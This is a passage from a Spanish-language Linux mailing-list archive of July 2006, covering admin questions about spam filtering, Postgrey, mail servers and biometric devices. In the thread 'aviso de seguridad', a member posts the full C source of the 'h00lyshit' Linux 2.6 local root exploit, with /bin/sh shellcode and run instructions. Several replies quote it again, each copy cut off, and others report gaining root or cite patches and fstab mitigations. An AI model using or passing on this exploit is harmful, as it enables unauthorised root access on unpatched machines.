Dispositivos biometricos
El Martes, 18 de Julio de 2006 18:12, Carlos A. Sepulveda M. escribió: Holas: Alguien ha tenido experiencia, de preferencia positiva ;-), con el uso de dispositivos biometricos? Alguna marca recomendada/recomendable para uso en linux? La idea es accesarlos desde una aplicacion en Perl. Saludos Si lo quieres usar con eDirectory (a través de NMAS), te sugiero que revises: http://www.biometricsdirect.com/Products/SW/SAFLINK.htm personalmente no lo he trabajado, pero tuve buenas recomendaciones por parte de un amigo venezolano. Saludos. -- Patricio Bruna V. Red Hat Certified Engineer IT Linux Ltda. http://www.it-linux.cl Fono/Fax: (+56-2) 697 11 66 Cel: (+56-8) 288 51 95
Por fín soporte NTFS RW?????
El mar, 18-07-2006 a las 09:50 -0400, David Aravena escribió: Amigos listeros hoy me llego esta noticia. http://sourceforge.net/mailarchive/forum.php?thread_id=23836054forum_id=2697 Será cierto??? Espero que si es cierto no sea tan venenoso como los conocidos captive y paragon. eso. Saludos -- David Aravana A. lo acabo de probar en gentoo linux y es bastante bueno y mas rapido k captive hasta el momento lo he encontrado muy bueno
Dispositivos biometricos
Felipe Tornvall wrote: yo estuve viendo unos sitios en usa que venden articulos con tec bio, que dispositivo buscas? podrias ser mas especifico ? ocular.. digital con bd... digital, con que mande la imagen me basta. Saludos y gracias -- Carlos A. Sepúlveda M. Jefe de Proyectos Linux Center Latin America Tel: (562)4834000; Fax: (562)4834050 [EMAIL PROTECTED] http://www.linuxcenterla.com From [EMAIL PROTECTED] Wed Jul 19 09:39:23 2006 From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?Jos=E9_Miguel_Vidal_?=Lavin) Date: Wed Jul 19 10:26:10 2006 Subject: AYUDA CONTRA SPAM In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] On Tue, 18 Jul 2006 10:52:23 -0400, Dario Guzman wrote Hola Les comento cual es mi situación. Actualmente dispongo de un equipo que funciona como servidor de Internet para una red de 20 equipos, este tiene instalado Red Hat 9, tiene configurado FETCHMAIL para bajar los correos, eso es todo.Originalmente este servidor filtraría los Spam, pero nunca lo terminaron de configurar, lo cual se convierte en mi tarea. He investigado acerca del tema, pero el información pero la información que he encontrado es un poco antigua, hablan de fetchmail, procmail, spamassassin. Necesito de vuestra ayuda y cooperación para llegar a un buen resultado. Lamentablemente mis conocimientos en la plataforma de Linux no son los mejores, pero intento hacer lo mejor que puedo y por lo que me he informado mucho. Atentamente Dario Guzman Este Mensaje esta destinado para el uso de la o las personas o entidades a quien ha sido dirigido y puede contener información reservada y confidencial que no puede ser divulgada, difundida, ni aprovechada en forma alguna. El uso no autorizado de la información contenida en este correo podrá ser sancionado de conformidad con la ley Chilena vigente. Si usted ha recibido este correo electrónico por error, le pedimos eliminarlo junto con los archivos adjuntos y avisar inmediatamente al remitente, respondiendo este mensaje. la documentacion que tienes debe ser muuy antigua si no te funciona para redhat 9, parte actualizando la maquina a una distro vigente y asi podras utilizar las herramientas que estan disponibles en estos momentos, parchar una maquina antigua es lo peor que podrias hacer. saludos pd: si usas redhat seria claro pasarte a FC 4 pero de preferencia debian ;) -- José Miguel Vidal Lavin Usuario Linux
Problema con Postgrey
Hola Lista: Tengo un problema con Postgrey, este anda bien pero cuando me mandan un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me manda un mensaje el Postfix que dice: Client host rejected:access denied..estas casillas las tengo habilitadas desde el archivo access de Postfix...y bien configurado en el main.cfesto funcionaba antes...pero Postgrey me debe haber bloqueado esos dominios a raiz que algunas casillas tipo SPAM no respondieron a la solicitud de reenvio de Postgrey.no se donde puedo desbloquear si es que estoy en lo cierto en toda la platica anterior..me pueden ayudar please... Gracias. Atte. Edison. próxima parte Se ha borrado un adjunto en formato HTML... URL: http://listas.inf.utfsm.cl/pipermail/linux/attachments/20060719/5382aa6b/attachment.html From [EMAIL PROTECTED] Wed Jul 19 12:46:52 2006 From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?=22Manuel_R=2E_Berci=E1n=22?=) Date: Wed Jul 19 12:36:52 2006 Subject: Servidor de Correo Open SuSE 10 Message-ID: [EMAIL PROTECTED] Estimados amigos!! Tengo un problema con mi servidor de correo, Open SuSE 10, resulta que cambiamos nuestro servidor a este, con las siguientes configuraciones Ldap + Postfix + Courier + Amavis + Spamassasin + Clamav 1. Pero por el momento no se como poner un mensaje de respuesta automatica de vacaciones a usuarios, alguien tiene idea de como hacerlo. 2. Otra pregunta, como direccionar correos de una cuenta a otra direccion. 3. Al haber direccionado la cuenta a otra direccion supongo que ya le llegaran tanto a esa cuenta como a la otra, pero los nuevos que le envien!!, Y los emails que ya estaban en ese buzon?, como hago para trasladarlos. Quiza es que no encuentro la informacion adecuada para hacerlo, y tambien me pueden decir que leer o articulos que conozcan, para estudiar mas del asunto y asi lograrlo. De antemano muchas Gracias por su Ayuda!! Manuel R. Bercián From [EMAIL PROTECTED] Wed Jul 19 12:25:41 2006 From: [EMAIL PROTECTED] (Carlos A. Sepulveda M.) Date: Wed Jul 19 13:24:13 2006 Subject: Problema con Postgrey In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Edison Caprile Pons wrote: Hola Lista: Tengo un problema con Postgrey, este anda bien pero cuando me mandan un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me manda un mensaje el Postfix que dice: Client host rejected:access denied.. Holas: Asi es como funciona greylisting. Todos los servers son malos, hasta que demuestren lo contrario. ;-) En resumen, cada vez que recibe un correo lo rechaza con la instruccion de reintertar despues, al reintentar el servidor lo deja pasar. (el principio es uqe los spammers no reintentan) Saludos -- Carlos A. Sepúlveda M. Jefe de Proyectos Linux Center Latin America Tel: (562)4834000; Fax: (562)4834050 [EMAIL PROTECTED] http://www.linuxcenterla.com From [EMAIL PROTECTED] Wed Jul 19 13:15:48 2006 From: [EMAIL PROTECTED] (Pablo Bitreras) Date: Wed Jul 19 13:46:46 2006 Subject: Problema con Postgrey In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Edison, Edita los archivos /etc/postgrey/whitelist_clients : Por si quieres que pase como lista blanca desde algún servidor en especial. (agregando yahoo.com o vtr.net) /etc/postgrey/whitelist_recipients : si quieres que pase hacia algún usuario ([EMAIL PROTECTED]) Saludos Edison Caprile Pons escribió: Hola Lista: Tengo un problema con Postgrey, este anda bien pero cuando me mandan un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me manda un mensaje el Postfix que dice: Client host rejected:access denied..estas casillas las tengo habilitadas desde el archivo access de Postfix...y bien configurado en el main.cfesto funcionaba antes...pero Postgrey me debe haber bloqueado esos dominios a raiz que algunas casillas tipo SPAM no respondieron a la solicitud de reenvio de Postgrey.no se donde puedo desbloquear si es que estoy en lo cierto en toda la platica anterior..me pueden ayudar please... Gracias. Atte. Edison.
Problema con Postgrey
Si, entiendo el concepto.pero se trata de dominios vtr.net, Hotmail.com, yahoo.com, yahoo.es, etc..que me imagino estan bien configurados...ademas los dejo pasar por medio de la lista de access de postfixpero ahora no funciona...sera por el propio Postgrey??---como le digo a Postgrey que me deje pasar algunas cuentas o dominios??...intente con un archivo por defecto que trae pero no pasa nada...alguna ayuda please... Gracias por los comentarios. -Mensaje original- De: Carlos A. Sepulveda M. [mailto:[EMAIL PROTECTED] Enviado el: Miércoles, 19 de Julio de 2006 12:26 Para: Discusion de Linux en Castellano Asunto: Re: Problema con Postgrey Edison Caprile Pons wrote: Hola Lista: Tengo un problema con Postgrey, este anda bien pero cuando me mandan un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me manda un mensaje el Postfix que dice: Client host rejected:access denied.. Holas: Asi es como funciona greylisting. Todos los servers son malos, hasta que demuestren lo contrario. ;-) En resumen, cada vez que recibe un correo lo rechaza con la instruccion de reintertar despues, al reintentar el servidor lo deja pasar. (el principio es uqe los spammers no reintentan) Saludos -- Carlos A. Sepúlveda M. Jefe de Proyectos Linux Center Latin America Tel: (562)4834000; Fax: (562)4834050 [EMAIL PROTECTED] http://www.linuxcenterla.com - This mail was scanned by a trial version of BitDefender For more informations please visit http://www.bitdefender.com -
Problema con Postgrey
Gracias...y con que comando genero la base una vez modificada??..ej: postmap archivo... -Mensaje original- De: Pablo Bitreras [mailto:[EMAIL PROTECTED] Enviado el: Miércoles, 19 de Julio de 2006 13:16 Para: Discusion de Linux en Castellano Asunto: Re: Problema con Postgrey Edison, Edita los archivos /etc/postgrey/whitelist_clients : Por si quieres que pase como lista blanca desde algún servidor en especial. (agregando yahoo.com o vtr.net) /etc/postgrey/whitelist_recipients : si quieres que pase hacia algún usuario ([EMAIL PROTECTED]) Saludos Edison Caprile Pons escribió: Hola Lista: Tengo un problema con Postgrey, este anda bien pero cuando me mandan un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me manda un mensaje el Postfix que dice: Client host rejected:access denied..estas casillas las tengo habilitadas desde el archivo access de Postfix...y bien configurado en el main.cfesto funcionaba antes...pero Postgrey me debe haber bloqueado esos dominios a raiz que algunas casillas tipo SPAM no respondieron a la solicitud de reenvio de Postgrey.no se donde puedo desbloquear si es que estoy en lo cierto en toda la platica anterior..me pueden ayudar please... Gracias. Atte. Edison. - This mail was scanned by a trial version of BitDefender For more informations please visit http://www.bitdefender.com -
Dispositivos biometricos
On Wednesday 19 July 2006 09:08, Carlos A. Sepulveda M. wrote: Felipe Tornvall wrote: yo estuve viendo unos sitios en usa que venden articulos con tec bio, que dispositivo buscas? podrias ser mas especifico ? ocular.. digital con bd... digital, con que mande la imagen me basta. Saludos y gracias pero quieres comunicarlo con alguna bd ? acuerdate que necesitas el sdk del software !!! asegurate de que venga- creo q esos q traen el sdk son los unicos que te sirven, -- ___ Felipe Tornvall N. lu: 400327 w: http://freeby.pctools.cl w: http://docs.pctools.cl w: http://linux.pctools.cl
aviso de seguridad - importante ver EXPLOIT adjunto
hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados hace una semana no pasa nada (via net install) * ** Author: h00lyshit ** Vulnerable: Linux 2.6 ALL ** Type of Vulnerability: Local Race ** Tested On : various distros ** Vendor Status: unknown ** ** Disclaimer: ** In no event shall the author be liable for any damages ** whatsoever arising out of or in connection with the use ** or spread of this information. ** Any use of this information is at the user's own risk. ** ** Compile: ** gcc h00lyshit.c -o h00lyshit ** ** Usage: ** h00lyshit very big file on the disk ** ** Example: ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 ** ** if y0u dont have one, make big file (~100MB) in /tmp with dd ** and try to junk the cache e.g. cat /usr/lib/* /dev/null ** */ #include stdio.h #include stdlib.h #include string.h #include unistd.h #include fcntl.h #include errno.h #include sched.h #include sys/types.h #include sys/stat.h #include sys/prctl.h #include sys/mman.h #include sys/wait.h #include linux/a.out.h #include asm/unistd.h static struct exec ex; static char *e[256]; static char *a[4]; static char b[512]; static char t[256]; static volatile int *c; /* h00lyshit shell code*/ __asm__ ( __excode: call1f \n 1: mov $23, %eax \n xor %ebx, %ebx \n int $0x80 \n pop %eax\n mov $cmd-1b, %ebx \n add %eax, %ebx \n mov $arg-1b, %ecx \n add %eax, %ecx \n mov %ebx, (%ecx)\n mov %ecx, %edx \n add $4, %edx\n mov $11, %eax \n int $0x80 \n mov $1, %eax\n int $0x80 \n arg:.quad 0x00, 0x00 \n cmd:.string \/bin/sh\ \n __excode_e: nop \n .global __excode\n .global __excode_e \n ); extern void (*__excode) (void); extern void (*__excode_e) (void); void error (char *err) { perror (err); fflush (stderr); exit (1); } /* exploit this shit */ void exploit (char *file) { int i, fd; void *p; struct stat st; printf (\ntrying to exploit %s\n\n, file); fflush (stdout); chmod (/proc/self/environ, 04755); c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); memset ((void *) c, 0, 4096); /* slow down machine */ fd = open (file, O_RDONLY); fstat (fd, st); p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (p == MAP_FAILED) error (mmap); prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); sprintf (t, /proc/%d/environ, getpid ()); sched_yield (); execve (NULL, a, e); madvise (0, 0, MADV_WILLNEED); i = fork (); /* give it a try */ if (i) { (*c)++; !madvise (p, st.st_size, MADV_WILLNEED) ? : error (madvise); prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); sched_yield (); } else { nice(10); while (!(*c)); sched_yield (); execve (t, a, e); error (failed); } waitpid (i, NULL, 0); exit (0); } int main (int ac, char **av) { int i, j, k, s; char *p; memset (e, 0, sizeof (e)); memset (a, 0, sizeof (a)); a[0] = strdup (av[0]); a[1] = strdup (av[0]); a[2] = strdup (av[1]); if (ac 2) error (usage: binary big file name); if (ac 2) exploit (av[2]); printf (\npreparing); fflush (stdout); /* make setuid a.out */ memset (ex, 0, sizeof (ex)); N_SET_MAGIC (ex, NMAGIC); N_SET_MACHTYPE (ex, M_386); s = ((unsigned) __excode_e) - (unsigned) __excode; ex.a_text = s; ex.a_syms = -(s + sizeof (ex)); memset (b, 0, sizeof (b)); memcpy (b, ex, sizeof (ex)); memcpy (b + sizeof (ex), __excode, s); /* make environment*/ p = b; s += sizeof (ex); j = 0; for (i = k = 0; i s; i++) {
aviso de seguridad - importante ver EXPLOIT adjunto
El Wednesday, 19 de July de 2006 16:54, Felipe Tornvall escribió: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse Sarge viene asi por defecto, me imagino que el resto de las distribuciones tambien :)
aviso de seguridad - importante ver EXPLOIT adjunto
Hola! El Wed, Jul 19, 2006 at 04:54:46PM -0400, Felipe Tornvall escribio: prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root [...] Arreglado en: Debian Sarge: DSA--1, 16/7/2006 Ubuntu 6.06: USN-319-1, 18/7/2006 Otras distribuciones, ya pronto estará el parche disponible. Daniel.
aviso de seguridad - importante ver EXPLOIT adjunto
2006/7/19, Felipe Tornvall [EMAIL PROTECTED]: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados hace una semana no pasa nada (via net install) * ** Author: h00lyshit ** Vulnerable: Linux 2.6 ALL ** Type of Vulnerability: Local Race ** Tested On : various distros ** Vendor Status: unknown ** ** Disclaimer: ** In no event shall the author be liable for any damages ** whatsoever arising out of or in connection with the use ** or spread of this information. ** Any use of this information is at the user's own risk. ** ** Compile: ** gcc h00lyshit.c -o h00lyshit ** ** Usage: ** h00lyshit very big file on the disk ** ** Example: ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 ** ** if y0u dont have one, make big file (~100MB) in /tmp with dd ** and try to junk the cache e.g. cat /usr/lib/* /dev/null ** */ #include stdio.h #include stdlib.h #include string.h #include unistd.h #include fcntl.h #include errno.h #include sched.h #include sys/types.h #include sys/stat.h #include sys/prctl.h #include sys/mman.h #include sys/wait.h #include linux/a.out.h #include asm/unistd.h static struct exec ex; static char *e[256]; static char *a[4]; static char b[512]; static char t[256]; static volatile int *c; /* h00lyshit shell code*/ __asm__ ( __excode: call1f \n 1: mov $23, %eax \n xor %ebx, %ebx \n int $0x80 \n pop %eax\n mov $cmd-1b, %ebx \n add %eax, %ebx \n mov $arg-1b, %ecx \n add %eax, %ecx \n mov %ebx, (%ecx)\n mov %ecx, %edx \n add $4, %edx\n mov $11, %eax \n int $0x80 \n mov $1, %eax\n int $0x80 \n arg:.quad 0x00, 0x00 \n cmd:.string \/bin/sh\ \n __excode_e: nop \n .global __excode\n .global __excode_e \n ); extern void (*__excode) (void); extern void (*__excode_e) (void); void error (char *err) { perror (err); fflush (stderr); exit (1); } /* exploit this shit */ void exploit (char *file) { int i, fd; void *p; struct stat st; printf (\ntrying to exploit %s\n\n, file); fflush (stdout); chmod (/proc/self/environ, 04755); c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); memset ((void *) c, 0, 4096); /* slow down machine */ fd = open (file, O_RDONLY); fstat (fd, st); p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (p == MAP_FAILED) error (mmap); prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); sprintf (t, /proc/%d/environ, getpid ()); sched_yield (); execve (NULL, a, e); madvise (0, 0, MADV_WILLNEED); i = fork (); /* give it a try */ if (i) { (*c)++; !madvise (p, st.st_size, MADV_WILLNEED) ? : error (madvise); prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); sched_yield (); } else { nice(10); while (!(*c)); sched_yield (); execve (t, a, e); error (failed); } waitpid (i, NULL, 0); exit (0); } int main (int ac, char **av) { int i, j, k, s; char *p; memset (e, 0, sizeof (e)); memset (a, 0, sizeof (a)); a[0] = strdup (av[0]); a[1] = strdup (av[0]); a[2] = strdup (av[1]); if (ac 2) error (usage: binary big file name); if (ac 2) exploit (av[2]); printf (\npreparing); fflush (stdout); /* make setuid a.out */ memset (ex, 0, sizeof (ex)); N_SET_MAGIC (ex, NMAGIC); N_SET_MACHTYPE (ex, M_386); s = ((unsigned) __excode_e) - (unsigned) __excode; ex.a_text = s; ex.a_syms = -(s + sizeof (ex)); memset (b, 0, sizeof (b));
aviso de seguridad - importante ver EXPLOIT adjunto
PORQUE EN MI FEDORA 3 DESACTUALIZADO DESDE HACE 2 AÑOS ME DA EL SIGUIENTE ERROR // [EMAIL PROTECTED]'s password: Last login: Wed Jul 19 18:25:59 2006 [EMAIL PROTECTED] ~]$ ./archivo xxx preparing trying to exploit xxx failed: Permission denied [EMAIL PROTECTED] ~]$ No sera un problema de DEBIAN? 2006/7/19, Felipe Tornvall [EMAIL PROTECTED]: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados hace una semana no pasa nada (via net install) * ** Author: h00lyshit ** Vulnerable: Linux 2.6 ALL ** Type of Vulnerability: Local Race ** Tested On : various distros ** Vendor Status: unknown ** ** Disclaimer: ** In no event shall the author be liable for any damages ** whatsoever arising out of or in connection with the use ** or spread of this information. ** Any use of this information is at the user's own risk. ** ** Compile: ** gcc h00lyshit.c -o h00lyshit ** ** Usage: ** h00lyshit very big file on the disk ** ** Example: ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 ** ** if y0u dont have one, make big file (~100MB) in /tmp with dd ** and try to junk the cache e.g. cat /usr/lib/* /dev/null ** */ #include stdio.h #include stdlib.h #include string.h #include unistd.h #include fcntl.h #include errno.h #include sched.h #include sys/types.h #include sys/stat.h #include sys/prctl.h #include sys/mman.h #include sys/wait.h #include linux/a.out.h #include asm/unistd.h static struct exec ex; static char *e[256]; static char *a[4]; static char b[512]; static char t[256]; static volatile int *c; /* h00lyshit shell code*/ __asm__ ( __excode: call1f \n 1: mov $23, %eax \n xor %ebx, %ebx \n int $0x80 \n pop %eax\n mov $cmd-1b, %ebx \n add %eax, %ebx \n mov $arg-1b, %ecx \n add %eax, %ecx \n mov %ebx, (%ecx)\n mov %ecx, %edx \n add $4, %edx\n mov $11, %eax \n int $0x80 \n mov $1, %eax\n int $0x80 \n arg:.quad 0x00, 0x00 \n cmd:.string \/bin/sh\ \n __excode_e: nop \n .global __excode\n .global __excode_e \n ); extern void (*__excode) (void); extern void (*__excode_e) (void); void error (char *err) { perror (err); fflush (stderr); exit (1); } /* exploit this shit */ void exploit (char *file) { int i, fd; void *p; struct stat st; printf (\ntrying to exploit %s\n\n, file); fflush (stdout); chmod (/proc/self/environ, 04755); c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); memset ((void *) c, 0, 4096); /* slow down machine */ fd = open (file, O_RDONLY); fstat (fd, st); p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (p == MAP_FAILED) error (mmap); prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); sprintf (t, /proc/%d/environ, getpid ()); sched_yield (); execve (NULL, a, e); madvise (0, 0, MADV_WILLNEED); i = fork (); /* give it a try */ if (i) { (*c)++; !madvise (p, st.st_size, MADV_WILLNEED) ? : error (madvise); prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); sched_yield (); } else { nice(10); while (!(*c)); sched_yield (); execve (t, a, e); error (failed); } waitpid (i, NULL, 0); exit (0); } int main (int ac, char **av) { int i, j, k, s; char *p; memset (e, 0, sizeof (e)); memset (a, 0, sizeof (a)); a[0] = strdup (av[0]); a[1] = strdup (av[0]); a[2] = strdup (av[1]); if (ac 2) error (usage:
aviso de seguridad - importante ver EXPLOIT adjunto
On 7/19/06, Alfredo Ramirez [EMAIL PROTECTED] wrote: Mi debian tiene esa linea proc/proc procdefaults0 0 y el exploit anduvo igual, mañana instalo una distro mas segura que no sea derivada de debian. Vas a tener que instalar una que no tenga el kernel linux, pues el problema esta allí. Y en ese caso ya no sería una distro Linux... -- Leonardo Soto M.
aviso de seguridad - importante ver EXPLOIT adjunto
Felipe Tornvall escribió: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root http://www.debian.org/security/2006/dsa- Esto es exclusivamente para la rama del kernel 2.6.8. El lunes, al hacer diariamente apt-get update apt-get dist-upgrade, me di cuenta que se descargo kernel-image-2.6.8. Luego mire en los avisos de seguridad de debian de que se trataba... De todas maneras la recomendacion es cambiar en la linea de /etc/fstab de proc, defaults por noexec nosuid. Es buena idea mandar el source del exploit por aqui? Lo digo para no alentar a algun lammer que este entre nosotros... -- Juan Martinez G. Departamento de Informatica Universidad Miguel de Cervantes From [EMAIL PROTECTED] Wed Jul 19 19:17:07 2006 From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?Juan_Mart=EDnez?=) Date: Wed Jul 19 20:05:23 2006 Subject: aviso de seguridad - importante ver EXPLOIT adjunto In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Alfredo Ramirez escribió: Mi debian tiene esa linea proc/proc procdefaults0 0 Miraste los avisos de seguridad de Debian? y el exploit anduvo igual, mañana instalo una distro mas segura que no sea derivada de debian. Claro... te recomiendo: Hasefrosh 2007, ultra edition professionly unsecure :D -- Juan Martinez G. Departamento de Informatica Universidad Miguel de Cervantes From [EMAIL PROTECTED] Wed Jul 19 18:36:39 2006 From: [EMAIL PROTECTED] (Horst von Brand) Date: Wed Jul 19 21:40:59 2006 Subject: Inodos In-Reply-To: Your message of Mon, 17 Jul 2006 22:28:26 -0400. [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Juan Ponce R [EMAIL PROTECTED] wrote: el odio hacia reiserfs de algunos para mi no es mas que FUD Las razones estan muy bien resumidas en http://wiki.kernelnewbies.org/WhyReiser4IsNotIn he usado durante años reiserfs y 0 problemas, de hecho la unica vez que tuve una perdida de datos fue cuando tenia un disco con ext3, coincidencia?, mala suerte?, no se... Coincidencia + mala (pesima) suerte. pero yo confio TODOS mis datos a reiserfs y jamas me ha decepcionado :) Bien por ti. Que la suerte te siga sonriendo. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de Informatica Fono: +56 32 654431 Universidad Tecnica Federico Santa Maria +56 32 654239 Casilla 110-V, Valparaiso, ChileFax: +56 32 797513
AYUDA CONTRA SPAM
Dario Guzman [EMAIL PROTECTED] wrote: ConfÃo en lo que me indiquen ustedes Asà que cuales son los pasos a seguir... y que es lo que se está utilizando ahora sendmail + milter-greylist + clamav Para volumenes /chicos/ sirve http://www.spamhaus.org (con volumenes grandes las consultas a DNS simplemente no las responde == correo se queda colgado; habria que optar por la opcion $$$) -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de Informatica Fono: +56 32 654431 Universidad Tecnica Federico Santa Maria +56 32 654239 Casilla 110-V, Valparaiso, ChileFax: +56 32 797513
linux + seguridad + libro ¿cual escojo?
NYARLATHOTEP El Caos Reptante [EMAIL PROTECTED] wrote: debido a algunos problemas tecnicos he decidido aumentar mi humilde biblioteca y les pregunto que libros me recomiendan. los que he estado mirando en amazon son: Hacking Linux Exposed, Second Edition Los libros de hacking a mi no me atraen particularmente, seguridad es /mucho/ mas que estarse preocupando de como hacer enloquecer programas. Maximum Linux Security (2nd Edition) Ni idea. SELinux: NSA's Open Source Security Enhanced Linu SELinux definitivamente se viene, pero le falta un buen resto para uso a lo ancho. Y cambia rapidamente... lo mas sano es partir con un RHEL (o CentOS, o Fedora) y tirarle dedo. Es /muy/ efectivo, pero duro de usar. Counter Hack: A Step-by-Step Guide to Computer Attacks and Effective Defenses Lo de step-by-step me huele mal. Y, repito, computer attacks != effective security, mas bien, hay a lo mas una relacion tenue entre las dos. Linux Network Security (Administrator's Advantage Series) Por el titulo... El que me ha llamado la atencion por los comentarios del los lectores es Hacking Linux Exposed, Second Edition, pero como no tengo mayor conocimiento en libros del tema, esperaba que me pudieran ayudar en ese tema... Date una vuelta por http://www.tldp.org, revisa la docu para tu distro. Demas hay comentarios sobre seguridad. Es muy util Bastille Linux (un conjunto de scripts para endurecer Unices (apunta a RHEL y HP-UX mas que nada, pero es aplicable mucho mas alla). Y para seguridad en Linux: - Instalar lo justo y necesario - Configurar con cuidado - Cortafuegos local no es mala idea... aunque no debiera hacer diferencia, si el resto esta bien - Mantenerse al dia con los anuncios de la distro - Mantener todo /rigurosamente/ al dia. Si es con Hasefroch, bueno, la idea de un bidon de 200l + cemento + centro de la bahia se me viene a la mente... -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de Informatica Fono: +56 32 654431 Universidad Tecnica Federico Santa Maria +56 32 654239 Casilla 110-V, Valparaiso, ChileFax: +56 32 797513 From [EMAIL PROTECTED] Wed Jul 19 22:21:10 2006 From: [EMAIL PROTECTED] (Horst von Brand) Date: Wed Jul 19 22:16:55 2006 Subject: alias temporal In-Reply-To: Your message of Tue, 18 Jul 2006 13:32:18 -0400. [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Victor Hugo dos Santos [EMAIL PROTECTED] wrote: Existe alguna manera de crear alias de correos temporales ??? que sirvan solamente por un correo ??? digamos que quiero tener un alias [EMAIL PROTECTED] por ejemplo y que estes solamente reciba un correo y que lo reenvie a [EMAIL PROTECTED] y que luego despues de esto ya no exista mas. Para que diantres quieres hacer esto?! Seguramente /hay/ opciones de solucion para tu problema. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de Informatica Fono: +56 32 654431 Universidad Tecnica Federico Santa Maria +56 32 654239 Casilla 110-V, Valparaiso, ChileFax: +56 32 797513
aviso de seguridad - importante ver EXPLOIT adjunto
El mié, 19-07-2006 a las 19:14 -0400, Juan Martínez escribió: Felipe Tornvall escribió: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root http://www.debian.org/security/2006/dsa- Esto es exclusivamente para la rama del kernel 2.6.8. El lunes, al hacer diariamente apt-get update apt-get dist-upgrade, me di cuenta que se descargo kernel-image-2.6.8. Luego mire en los avisos de seguridad de debian de que se trataba... De todas maneras la recomendacion es cambiar en la linea de /etc/fstab de proc, defaults por noexec nosuid. Es buena idea mandar el source del exploit por aqui? Lo digo para no alentar a algun lammer que este entre nosotros... Tengo gentoo Linux con kernel 2.6.17 y en fstab tengo la linea: proc /proc proc defaults 0 0 y el exploit funciono :S
aviso de seguridad - importante ver EXPLOIT adjunto
Juan MartÃnez [EMAIL PROTECTED] wrote: Felipe Tornvall escribió: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root http://www.debian.org/security/2006/dsa- Esto es exclusivamente para la rama del kernel 2.6.8. Algo asi como = 2.6.8 De todas maneras la recomendacion es cambiar en la linea de /etc/fstab de proc, defaults por noexec nosuid. O usar SELinux (es la razon que dan en Fedora para no actualizar el nucleo (aun, hay mas pifias encoladas...)) Es buena idea mandar el source del exploit por aqui? Si. Asi puedes verificar si el problema te afecta o no. Lo digo para no alentar a algun lammer que este entre nosotros... Crees que esa clase de debiles mentales no tienen mecanismos mas expeditos para obtener estas gracias? -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de Informatica Fono: +56 32 654431 Universidad Tecnica Federico Santa Maria +56 32 654239 Casilla 110-V, Valparaiso, ChileFax: +56 32 797513 From [EMAIL PROTECTED] Wed Jul 19 23:25:17 2006 From: [EMAIL PROTECTED] (Carlos Massoglia) Date: Wed Jul 19 23:20:43 2006 Subject: aviso de seguridad - importante ver EXPLOIT adjunto In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: 